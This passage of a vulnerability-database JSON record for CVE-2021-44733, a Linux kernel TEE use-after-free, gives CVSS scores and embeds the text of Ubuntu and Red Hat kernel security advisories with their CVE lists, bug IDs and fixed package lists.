                "cpe_name": [],
                "vulnerable": false
              }
            ],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-44733"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Ubuntu",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "166400"
      },
      {
        "db": "PACKETSTORM",
        "id": "166397"
      },
      {
        "db": "PACKETSTORM",
        "id": "166392"
      },
      {
        "db": "PACKETSTORM",
        "id": "166708"
      },
      {
        "db": "PACKETSTORM",
        "id": "166636"
      }
    ],
    "trust": 0.5
  },
  "cve": "CVE-2021-44733",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 4.4,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 3.4,
            "id": "CVE-2021-44733",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.1,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "HIGH",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.0,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.0,
            "id": "CVE-2021-44733",
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2021-44733",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202112-2166",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2021-44733",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2021-44733"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202112-2166"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-44733"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "A use-after-free exists in drivers/tee/tee_shm.c in the TEE subsystem in the Linux kernel through 5.15.11. This occurs because of a race condition in tee_shm_get_from_id during an attempt to free a shared memory object. ==========================================================================\nUbuntu Security Notice USN-5368-1\nApril 06, 2022\n\nlinux-azure-5.13, linux-oracle-5.13 vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 20.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in the Linux kernel. \n\nSoftware Description:\n- linux-azure-5.13: Linux kernel for Microsoft Azure cloud systems\n- linux-oracle-5.13: Linux kernel for Oracle Cloud systems\n\nDetails:\n\nIt was discovered that the BPF verifier in the Linux kernel did not\nproperly restrict pointer types in certain situations. A local attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2022-23222)\n\nIt was discovered that the network traffic control implementation in the\nLinux kernel contained a use-after-free vulnerability. A local attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2022-1055)\n\nYiqi Sun and Kevin Wang discovered that the cgroups implementation in the\nLinux kernel did not properly restrict access to the cgroups v1\nrelease_agent feature. A local attacker could use this to gain\nadministrative privileges. (CVE-2022-0492)\n\nJ\\xfcrgen Gro\\xdf discovered that the Xen subsystem within the Linux kernel did\nnot adequately limit the number of events driver domains (unprivileged PV\nbackends) could send to other guest VMs. An attacker in a driver domain\ncould use this to cause a denial of service in other guest VMs. \n(CVE-2021-28711, CVE-2021-28712, CVE-2021-28713)\n\nJ\\xfcrgen Gro\\xdf discovered that the Xen network backend driver in the Linux\nkernel did not adequately limit the amount of queued packets when a guest\ndid not process them. An attacker in a guest VM can use this to cause a\ndenial of service (excessive kernel memory consumption) in the network\nbackend domain. (CVE-2021-28714, CVE-2021-28715)\n\nSzymon Heidrich discovered that the USB Gadget subsystem in the Linux\nkernel did not properly restrict the size of control requests for certain\ngadget types, leading to possible out of bounds reads or writes. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2021-39685)\n\nIt was discovered that a race condition existed in the poll implementation\nin the Linux kernel, resulting in a use-after-free vulnerability. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2021-39698)\n\nIt was discovered that the simulated networking device driver for the Linux\nkernel did not properly initialize memory in certain situations. A local\nattacker could use this to expose sensitive information (kernel memory). \n(CVE-2021-4135)\n\nEric Biederman discovered that the cgroup process migration implementation\nin the Linux kernel did not perform permission checks correctly in some\nsituations. A local attacker could possibly use this to gain administrative\nprivileges. (CVE-2021-4197)\n\nBrendan Dolan-Gavitt discovered that the aQuantia AQtion Ethernet device\ndriver in the Linux kernel did not properly validate meta-data coming from\nthe device. A local attacker who can control an emulated device can use\nthis to cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2021-43975)\n\nIt was discovered that the ARM Trusted Execution Environment (TEE)\nsubsystem in the Linux kernel contained a race condition leading to a use-\nafter-free vulnerability. A local attacker could use this to cause a denial\nof service or possibly execute arbitrary code. (CVE-2021-44733)\n\nIt was discovered that the Phone Network protocol (PhoNet) implementation\nin the Linux kernel did not properly perform reference counting in some\nerror conditions. A local attacker could possibly use this to cause a\ndenial of service (memory exhaustion). (CVE-2021-45095)\n\nIt was discovered that the eBPF verifier in the Linux kernel did not\nproperly perform bounds checking on mov32 operations. A local attacker\ncould use this to expose sensitive information (kernel pointer addresses). \n(CVE-2021-45402)\n\nIt was discovered that the Reliable Datagram Sockets (RDS) protocol\nimplementation in the Linux kernel did not properly deallocate memory in\nsome error conditions. A local attacker could possibly use this to cause a\ndenial of service (memory exhaustion). (CVE-2021-45480)\n\nIt was discovered that the BPF subsystem in the Linux kernel did not\nproperly track pointer types on atomic fetch operations in some situations. \nA local attacker could use this to expose sensitive information (kernel\npointer addresses). (CVE-2022-0264)\n\nIt was discovered that the TIPC Protocol implementation in the Linux kernel\ndid not properly initialize memory in some situations. A local attacker\ncould use this to expose sensitive information (kernel memory). \n(CVE-2022-0382)\n\nSamuel Page discovered that the Transparent Inter-Process Communication\n(TIPC) protocol implementation in the Linux kernel contained a stack-based\nbuffer overflow. A remote attacker could use this to cause a denial of\nservice (system crash) for systems that have a TIPC bearer configured. \n(CVE-2022-0435)\n\nIt was discovered that the KVM implementation for s390 systems in the Linux\nkernel did not properly prevent memory operations on PVM guests that were\nin non-protected mode. A local attacker could use this to obtain\nunauthorized memory write access. (CVE-2022-0516)\n\nIt was discovered that the ICMPv6 implementation in the Linux kernel did\nnot properly deallocate memory in certain situations. A remote attacker\ncould possibly use this to cause a denial of service (memory exhaustion). \n(CVE-2022-0742)\n\nIt was discovered that the IPsec implementation in the Linux kernel did not\nproperly allocate enough memory when performing ESP transformations,\nleading to a heap-based buffer overflow. A local attacker could use this to\ncause a denial of service (system crash) or possibly execute arbitrary\ncode. (CVE-2022-27666)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 20.04 LTS:\n  linux-image-5.13.0-1021-azure   5.13.0-1021.24~20.04.1\n  linux-image-5.13.0-1025-oracle  5.13.0-1025.30~20.04.1\n  linux-image-azure               5.13.0.1021.24~20.04.10\n  linux-image-oracle              5.13.0.1025.30~20.04.1\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. \n\nReferences:\n  https://ubuntu.com/security/notices/USN-5368-1\n  CVE-2021-28711, CVE-2021-28712, CVE-2021-28713, CVE-2021-28714,\n  CVE-2021-28715, CVE-2021-39685, CVE-2021-39698, CVE-2021-4135,\n  CVE-2021-4197, CVE-2021-43975, CVE-2021-44733, CVE-2021-45095,\n  CVE-2021-45402, CVE-2021-45480, CVE-2022-0264, CVE-2022-0382,\n  CVE-2022-0435, CVE-2022-0492, CVE-2022-0516, CVE-2022-0742,\n  CVE-2022-1055, CVE-2022-23222, CVE-2022-27666\n\nPackage Information:\n  https://launchpad.net/ubuntu/+source/linux-azure-5.13/5.13.0-1021.24~20.04.1\n  https://launchpad.net/ubuntu/+source/linux-oracle-5.13/5.13.0-1025.30~20.04.1\n\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n=====================================================================\n                   Red Hat Security Advisory\n\nSynopsis:          Important: kernel security, bug fix, and enhancement update\nAdvisory ID:       RHSA-2022:1988-01\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://access.redhat.com/errata/RHSA-2022:1988\nIssue date:        2022-05-10\nCVE Names:         CVE-2020-0404 CVE-2020-4788 CVE-2020-13974 \n                   CVE-2020-27820 CVE-2021-0941 CVE-2021-3612 \n                   CVE-2021-3669 CVE-2021-3743 CVE-2021-3744 \n                   CVE-2021-3752 CVE-2021-3759 CVE-2021-3764 \n                   CVE-2021-3772 CVE-2021-3773 CVE-2021-4002 \n                   CVE-2021-4037 CVE-2021-4083 CVE-2021-4157 \n                   CVE-2021-4197 CVE-2021-4203 CVE-2021-20322 \n                   CVE-2021-21781 CVE-2021-26401 CVE-2021-29154 \n                   CVE-2021-37159 CVE-2021-41864 CVE-2021-42739 \n                   CVE-2021-43056 CVE-2021-43389 CVE-2021-43976 \n                   CVE-2021-44733 CVE-2021-45485 CVE-2021-45486 \n                   CVE-2022-0001 CVE-2022-0002 CVE-2022-0286 \n                   CVE-2022-0322 CVE-2022-1011 \n=====================================================================\n\n1. Summary:\n\nAn update for kernel is now available for Red Hat Enterprise Linux 8. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat CodeReady Linux Builder (v. 8) - aarch64, ppc64le, x86_64\nRed Hat Enterprise Linux BaseOS (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64\n\n3. \n\nSecurity Fix(es):\n\n* kernel: fget: check that the fd still exists after getting a ref to it\n(CVE-2021-4083)\n\n* kernel: avoid cyclic entity chains due to malformed USB descriptors\n(CVE-2020-0404)\n\n* kernel: speculation on incompletely validated data on IBM Power9\n(CVE-2020-4788)\n\n* kernel: integer overflow in k_ascii() in drivers/tty/vt/keyboard.c\n(CVE-2020-13974)\n\n* kernel: out-of-bounds read in bpf_skb_change_head() of filter.c due to a\nuse-after-free (CVE-2021-0941)\n\n* kernel: joydev: zero size passed to joydev_handle_JSIOCSBTNMAP()\n(CVE-2021-3612)\n\n* kernel: reading /proc/sysvipc/shm does not scale with large shared memory\nsegment counts (CVE-2021-3669)\n\n* kernel: out-of-bound Read in qrtr_endpoint_post in net/qrtr/qrtr.c\n(CVE-2021-3743)\n\n* kernel: crypto: ccp - fix resource leaks in ccp_run_aes_gcm_cmd()\n(CVE-2021-3744)\n\n* kernel: possible use-after-free in bluetooth module (CVE-2021-3752)\n\n* kernel: unaccounted ipc objects in Linux kernel lead to breaking memcg\nlimits and DoS attacks (CVE-2021-3759)\n\n* kernel: DoS in ccp_run_aes_gcm_cmd() function (CVE-2021-3764)\n\n* kernel: sctp: Invalid chunks may be used to remotely remove existing\nassociations (CVE-2021-3772)\n\n* kernel: lack of port sanity checking in natd and netfilter leads to\nexploit of OpenVPN clients (CVE-2021-3773)\n\n* kernel: possible leak or coruption of data residing on hugetlbfs\n(CVE-2021-4002)\n\n* kernel: security regression for CVE-2018-13405 (CVE-2021-4037)\n\n* kernel: Buffer overwrite in decode_nfs_fh function (CVE-2021-4157)\n\n* kernel: cgroup: Use open-time creds and namespace for migration perm\nchecks (CVE-2021-4197)\n\n* kernel: Race condition in races in sk_peer_pid and sk_peer_cred accesses\n(CVE-2021-4203)\n\n* kernel: new DNS Cache Poisoning Attack based on ICMP fragment needed\npackets replies (CVE-2021-20322)\n\n* kernel: arm: SIGPAGE information disclosure vulnerability\n(CVE-2021-21781)\n\n* hw: cpu: LFENCE/JMP Mitigation Update for CVE-2017-5715 (CVE-2021-26401)\n\n* kernel: Local privilege escalation due to incorrect BPF JIT branch\ndisplacement computation (CVE-2021-29154)\n\n* kernel: use-after-free in hso_free_net_device() in drivers/net/usb/hso.c\n(CVE-2021-37159)\n\n* kernel: eBPF multiplication integer overflow in\nprealloc_elems_and_freelist() in kernel/bpf/stackmap.c leads to\nout-of-bounds write (CVE-2021-41864)\n\n* kernel: Heap buffer overflow in firedtv driver (CVE-2021-42739)\n\n* kernel: ppc: kvm: allows a malicious KVM guest to crash the host\n(CVE-2021-43056)\n\n* kernel: an array-index-out-bounds in detach_capi_ctr in\ndrivers/isdn/capi/kcapi.c (CVE-2021-43389)\n\n* kernel: mwifiex_usb_recv() in drivers/net/wireless/marvell/mwifiex/usb.c\nallows an attacker to cause DoS via crafted USB device (CVE-2021-43976)\n\n* kernel: use-after-free in the TEE subsystem (CVE-2021-44733)\n\n* kernel: information leak in the IPv6 implementation (CVE-2021-45485)\n\n* kernel: information leak in the IPv4 implementation (CVE-2021-45486)\n\n* hw: cpu: intel: Branch History Injection (BHI) (CVE-2022-0001)\n\n* hw: cpu: intel: Intra-Mode BTI (CVE-2022-0002)\n\n* kernel: Local denial of service in bond_ipsec_add_sa (CVE-2022-0286)\n\n* kernel: DoS in sctp_addto_chunk in net/sctp/sm_make_chunk.c\n(CVE-2022-0322)\n\n* kernel: FUSE allows UAF reads of write() buffers, allowing theft of\n(partial) /etc/shadow hashes (CVE-2022-1011)\n\n* kernel: use-after-free in nouveau kernel module (CVE-2020-27820)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 8.6 Release Notes linked from the References section. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1888433 - CVE-2020-4788 kernel: speculation on incompletely validated data on IBM Power9\n1901726 - CVE-2020-27820 kernel: use-after-free in nouveau kernel module\n1919791 - CVE-2020-0404 kernel: avoid cyclic entity chains due to malformed USB descriptors\n1946684 - CVE-2021-29154 kernel: Local privilege escalation due to incorrect BPF JIT branch displacement computation\n1951739 - CVE-2021-42739 kernel: Heap buffer overflow in firedtv driver\n1957375 - [RFE] x86, tsc: Add kcmdline args for skipping tsc calibration sequences\n1974079 - CVE-2021-3612 kernel: joydev: zero size passed to joydev_handle_JSIOCSBTNMAP()\n1981950 - CVE-2021-21781 kernel: arm: SIGPAGE information disclosure vulnerability\n1983894 - Hostnetwork pod to service backed by hostnetwork on the same node is not working with OVN Kubernetes\n1985353 - CVE-2021-37159 kernel: use-after-free in hso_free_net_device() in drivers/net/usb/hso.c\n1986473 - CVE-2021-3669 kernel: reading /proc/sysvipc/shm does not scale with large shared memory segment counts\n1994390 - FIPS: deadlock between PID 1 and \"modprobe crypto-jitterentropy_rng\" at boot, preventing system to boot\n1997338 - block: update to upstream v5.14\n1997467 - CVE-2021-3764 kernel: DoS in ccp_run_aes_gcm_cmd() function\n1997961 - CVE-2021-3743 kernel: out-of-bound Read in qrtr_endpoint_post in net/qrtr/qrtr.c\n1999544 - CVE-2021-3752 kernel: possible use-after-free in bluetooth module\n1999675 - CVE-2021-3759 kernel: unaccounted ipc objects in Linux kernel lead to breaking memcg limits and DoS attacks\n2000627 - CVE-2021-3744 kernel: crypto: ccp - fix resource leaks in ccp_run_aes_gcm_cmd()\n2000694 - CVE-2021-3772 kernel: sctp: Invalid chunks may be used to remotely remove existing associations\n2004949 - CVE-2021-3773 kernel: lack of port sanity checking in natd and netfilter leads to exploit of OpenVPN clients\n2009312 - Incorrect system time reported by the cpu guest statistics (PPC only). \n2009521 - XFS: sync to upstream v5.11\n2010463 - CVE-2021-41864 kernel: eBPF multiplication integer overflow in prealloc_elems_and_freelist() in kernel/bpf/stackmap.c leads to out-of-bounds write\n2011104 - statfs reports wrong free space for small quotas\n2013180 - CVE-2021-43389 kernel: an array-index-out-bounds in detach_capi_ctr in drivers/isdn/capi/kcapi.c\n2014230 - CVE-2021-20322 kernel: new DNS Cache Poisoning Attack based on ICMP fragment needed packets replies\n2015525 - SCTP peel-off with SELinux and containers in OCP\n2015755 - zram: zram leak with warning when running zram02.sh in ltp\n2016169 - CVE-2020-13974 kernel: integer overflow in k_ascii() in drivers/tty/vt/keyboard.c\n2017073 - CVE-2021-43056 kernel: ppc: kvm: allows a malicious KVM guest to crash the host\n2017796 - ceph omnibus backport for RHEL-8.6.0\n2018205 - CVE-2021-0941 kernel: out-of-bounds read in bpf_skb_change_head() of filter.c due to a use-after-free\n2022814 - Rebase the input and HID stack in 8.6 to v5.15\n2025003 - CVE-2021-43976 kernel: mwifiex_usb_recv() in drivers/net/wireless/marvell/mwifiex/usb.c allows an attacker to cause DoS via crafted USB device\n2025726 - CVE-2021-4002 kernel: possible leak or coruption of data residing on hugetlbfs\n2027239 - CVE-2021-4037 kernel: security regression for CVE-2018-13405\n2029923 - CVE-2021-4083 kernel: fget: check that the fd still exists after getting a ref to it\n2030476 - Kernel 4.18.0-348.2.1 secpath_cache memory leak involving strongswan tunnel\n2030747 - CVE-2021-44733 kernel: use-after-free in the TEE subsystem\n2031200 - rename(2) fails on subfolder mounts when the share path has a trailing slash\n2034342 - CVE-2021-4157 kernel: Buffer overwrite in decode_nfs_fh function\n2035652 - CVE-2021-4197 kernel: cgroup: Use open-time creds and namespace for migration perm checks\n2036934 - CVE-2021-4203 kernel: Race condition in races in sk_peer_pid and sk_peer_cred accesses\n2037019 - CVE-2022-0286 kernel: Local denial of service in bond_ipsec_add_sa\n2039911 - CVE-2021-45485 kernel: information leak in the IPv6 implementation\n2039914 - CVE-2021-45486 kernel: information leak in the IPv4 implementation\n2042798 - [RHEL8.6][sfc] General sfc driver update\n2042822 - CVE-2022-0322 kernel: DoS in sctp_addto_chunk in net/sctp/sm_make_chunk.c\n2043453 - [RHEL8.6 wireless] stack \u0026 drivers general update to v5.16+\n2046021 - kernel 4.18.0-358.el8 async dirops causes write errors with namespace restricted caps\n2048251 - Selinux  is not  allowing SCTP connection setup between inter pod communication in enforcing mode\n2061700 - CVE-2021-26401 hw: cpu: LFENCE/JMP Mitigation Update for CVE-2017-5715\n2061712 - CVE-2022-0001 hw: cpu: intel: Branch History Injection (BHI)\n2061721 - CVE-2022-0002 hw: cpu: intel: Intra-Mode BTI\n2064855 - CVE-2022-1011 kernel: FUSE allows UAF reads of write() buffers, allowing theft of (partial) /etc/shadow hashes\n\n6. Package List:\n\nRed Hat Enterprise Linux BaseOS (v. 8):\n\nSource:\nkernel-4.18.0-372.9.1.el8.src.rpm\n\naarch64:\nbpftool-4.18.0-372.9.1.el8.aarch64.rpm\nbpftool-debuginfo-4.18.0-372.9.1.el8.aarch64.rpm\nkernel-4.18.0-372.9.1.el8.aarch64.rpm\nkernel-core-4.18.0-372.9.1.el8.aarch64.rpm\nkernel-cross-headers-4.18.0-372.9.1.el8.aarch64.rpm\nkernel-debug-4.18.0-372.9.1.el8.aarch64.rpm\nkernel-debug-core-4.18.0-372.9.1.el8.aarch64.rpm\nkernel-debug-debuginfo-4.18.0-372.9.1.el8.aarch64.rpm\nkernel-debug-devel-4.18.0-372.9.1.el8.aarch64.rpm\nkernel-debug-modules-4.18.0-372.9.1.el8.aarch64.rpm\nkernel-debug-modules-extra-4.18.0-372.9.1.el8.aarch64.rpm\nkernel-debuginfo-4.18.0-372.9.1.el8.aarch64.rpm\nkernel-debuginfo-common-aarch64-4.18.0-372.9.1.el8.aarch64.rpm\nkernel-devel-4.18.0-372.9.1.el8.aarch64.rpm\nkernel-headers-4.18.0-372.9.1.el8.aarch64.rpm\nkernel-modules-4.18.0-372.9.1.el8.aarch64.rpm\nkernel-modules-extra-4.18.0-372.9.1.el8.aarch64.rpm\nkernel-tools-4.18.0-372.9.1.el8.aarch64.rpm\nkernel-tools-debuginfo-4.18.0-372.9.1.el8.aarch64.rpm\nkernel-tools-libs-4.18.0-372.9.1.el8.aarch64.rpm\nperf-4.18.0-372.9.1.el8.aarch64.rpm\nperf-debuginfo-4.18.0-372.9.1.el8.aarch64.rpm\npython3-perf-4.18.0-372.9.1.el8.aarch64.rpm\npython3-perf-debuginfo-4.18.0-372.9.1.el8.aarch64.rpm\n\nnoarch:\nkernel-abi-stablelists-4.18.0-372.9.1.el8.noarch.rpm\nkernel-doc-4.18.0-372.9.1.el8.noarch.rpm\n\nppc64le:\nbpftool-4.18.0-372.9.1.el8.ppc64le.rpm\nbpftool-debuginfo-4.18.0-372.9.1.el8.ppc64le.rpm\nkernel-4.18.0-372.9.1.el8.ppc64le.rpm\nkernel-core-4.18.0-372.9.1.el8.ppc64le.rpm\nkernel-cross-headers-4.18.0-372.9.1.el8.ppc64le.rpm\nkernel-debug-4.18.0-372.9.1.el8.ppc64le.rpm\nkernel-debug-core-4.18.0-372.9.1.el8.ppc64le.rpm\nkernel-debug-debuginfo-4.18.0-372.9.1.el8.ppc64le.rpm\nkernel-debug-devel-4.18.0-372.9.1.el8.ppc64le.rpm\nkernel-debug-modules-4.18.0-372.9.1.el8.ppc64le.rpm\nkernel-debug-modules-extra-4.18.0-372.9.1.el8.ppc64le.rpm\nkernel-debuginfo-4.18.0-372.9.1.el8.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-4.18.0-372.9.1.el8.ppc64le.rpm\nkernel-devel-4.18.0-372.9.1.el8.ppc64le.rpm\nkernel-headers-4.18.0-372.9.1.el8.ppc64le.rpm\nkernel-modules-4.18.0-372.9.1.el8.ppc64le.rpm\nkernel-modules-extra-4.18.0-372.9.1.el8.ppc64le.rpm\nkernel-tools-4.18.0-372.9.1.el8.ppc64le.rpm\nkernel-tools-debuginfo-4.18.0-372.9.1.el8.ppc64le.rpm\nkernel-tools-libs-4.18.0-372.9.1.el8.ppc64le.rpm\nperf-4.18.0-372.9.1.el8.ppc64le.rpm\nperf-debuginfo-4.18.0-372.9.1.el8.ppc64le.rpm\npython3-perf-4.18.0-372.9.1.el8.ppc64le.rpm\npython3-perf-debuginfo-4.18.0-372.9.1.el8.ppc64le.rpm\n\ns390x:\nbpftool-4.18.0-372.9.1.el8.s390x.rpm\nbpftool-debuginfo-4.18.0-372.9.1.el8.s390x.rpm\nkernel-4.18.0-372.9.1.el8.s390x.rpm\nkernel-core-4.18.0-372.9.1.el8.s390x.rpm\nkernel-cross-headers-4.18.0-372.9.1.el8.s390x.rpm\nkernel-debug-4.18.0-372.9.1.el8.s390x.rpm\nkernel-debug-core-4.18.0-372.9.1.el8.s390x.rpm\nkernel-debug-debuginfo-4.18.0-372.9.1.el8.s390x.rpm\nkernel-debug-devel-4.18.0-372.9.1.el8.s390x.rpm\nkernel-debug-modules-4.18.0-372.9.1.el8.s390x.rpm\nkernel-debug-modules-extra-4.18.0-372.9.1.el8.s390x.rpm\nkernel-debuginfo-4.18.0-372.9.1.el8.s390x.rpm\nkernel-debuginfo-common-s390x-4.18.0-372.9.1.el8.s390x.rpm\nkernel-devel-4.18.0-372.9.1.el8.s390x.rpm\nkernel-headers-4.18.0-372.9.1.el8.s390x.rpm\nkernel-modules-4.18.0-372.9.1.el8.s390x.rpm\nkernel-modules-extra-4.18.0-372.9.1.el8.s390x.rpm\nkernel-tools-4.18.0-372.9.1.el8.s390x.rpm\nkernel-tools-debuginfo-4.18.0-372.9.1.el8.s390x.rpm\nkernel-zfcpdump-4.18.0-372.9.1.el8.s390x.rpm\nkernel-zfcpdump-core-4.18.0-372.9.1.el8.s390x.rpm\nkernel-zfcpdump-debuginfo-4.18.0-372.9.1.el8.s390x.rpm\nkernel-zfcpdump-devel-4.18.0-372.9.1.el8.s390x.rpm\nkernel-zfcpdump-modules-4.18.0-372.9.1.el8.s390x.rpm\nkernel-zfcpdump-modules-extra-4.18.0-372.9.1.el8.s390x.rpm\nperf-4.18.0-372.9.1.el8.s390x.rpm\nperf-debuginfo-4.18.0-372.9.1.el8.s390x.rpm\npython3-perf-4.18.0-372.9.1.el8.s390x.rpm\npython3-perf-debuginfo-4.18.0-372.9.1.el8.s390x.rpm\n\nx86_64:\nbpftool-4.18.0-372.9.1.el8.x86_64.rpm\nbpftool-debuginfo-4.18.0-372.9.1.el8.x86_64.rpm\nkernel-4.18.0-372.9.1.el8.x86_64.rpm\nkernel-core-4.18.0-372.9.1.el8.x86_64.rpm\nkernel-cross-headers-4.18.0-372.9.1.el8.x86_64.rpm\nkernel-debug-4.18.0-372.9.1.el8.x86_64.rpm\nkernel-debug-core-4.18.0-372.9.1.el8.x86_64.rpm\nkernel-debug-debuginfo-4.18.0-372.9.1.el8.x86_64.rpm\nkernel-debug-devel-4.18.0-372.9.1.el8.x86_64.rpm\nkernel-debug-modules-4.18.0-372.9.1.el8.x86_64.rpm\nkernel-debug-modules-extra-4.18.0-372.9.1.el8.x86_64.rpm\nkernel-debuginfo-4.18.0-372.9.1.el8.x86_64.rpm\nkernel-debuginfo-common-x86_64-4.18.0-372.9.1.el8.x86_64.rpm\nkernel-devel-4.18.0-372.9.1.el8.x86_64.rpm\nkernel-headers-4.18.0-372.9.1.el8.x86_64.rpm\nkernel-modules-4.18.0-372.9.1.el8.x86_64.rpm\nkernel-modules-extra-4.18.0-372.9.1.el8.x86_64.rpm\nkernel-tools-4.18.0-372.9.1.el8.x86_64.rpm\nkernel-tools-debuginfo-4.18.0-372.9.1.el8.x86_64.rpm\nkernel-tools-libs-4.18.0-372.9.1.el8.x86_64.rpm\nperf-4.18.0-372.9.1.el8.x86_64.rpm\nperf-debuginfo-4.18.0-372.9.1.el8.x86_64.rpm\npython3-perf-4.18.0-372.9.1.el8.x86_64.rpm\npython3-perf-debuginfo-4.18.0-372.9.1.el8.x86_64.rpm\n\nRed Hat CodeReady Linux Builder (v. 8):\n\naarch64:\nbpftool-debuginfo-4.18.0-372.9.1.el8.aarch64.rpm\nkernel-debug-debuginfo-4.18.0-372.9.1.el8.aarch64.rpm\nkernel-debuginfo-4.18.0-372.9.1.el8.aarch64.rpm\nkernel-debuginfo-common-aarch64-4.18.0-372.9.1.el8.aarch64.rpm\nkernel-tools-debuginfo-4.18.0-372.9.1.el8.aarch64.rpm\nkernel-tools-libs-devel-4.18.0-372.9.1.el8.aarch64.rpm\nperf-debuginfo-4.18.0-372.9.1.el8.aarch64.rpm\npython3-perf-debuginfo-4.18.0-372.9.1.el8.aarch64.rpm\n\nppc64le:\nbpftool-debuginfo-4.18.0-372.9.1.el8.ppc64le.rpm\nkernel-debug-debuginfo-4.18.0-372.9.1.el8.ppc64le.rpm\nkernel-debuginfo-4.18.0-372.9.1.el8.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-4.18.0-372.9.1.el8.ppc64le.rpm\nkernel-tools-debuginfo-4.18.0-372.9.1.el8.ppc64le.rpm\nkernel-tools-libs-devel-4.18.0-372.9.1.el8.ppc64le.rpm\nperf-debuginfo-4.18.0-372.9.1.el8.ppc64le.rpm\npython3-perf-debuginfo-4.18.0-372.9.1.el8.ppc64le.rpm\n\nx86_64:\nbpftool-debuginfo-4.18.0-372.9.1.el8.x86_64.rpm\nkernel-debug-debuginfo-4.18.0-372.9.1.el8.x86_64.rpm\nkernel-debuginfo-4.18.0-372.9.1.el8.x86_64.rpm\nkernel-debuginfo-common-x86_64-4.18.0-372.9.1.el8.x86_64.rpm\nkernel-tools-debuginfo-4.18.0-372.9.1.el8.x86_64.rpm\nkernel-tools-libs-devel-4.18.0-372.9.1.el8.x86_64.rpm\nperf-debuginfo-4.18.0-372.9.1.el8.x86_64.rpm\npython3-perf-debuginfo-4.18.0-372.9.1.el8.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available 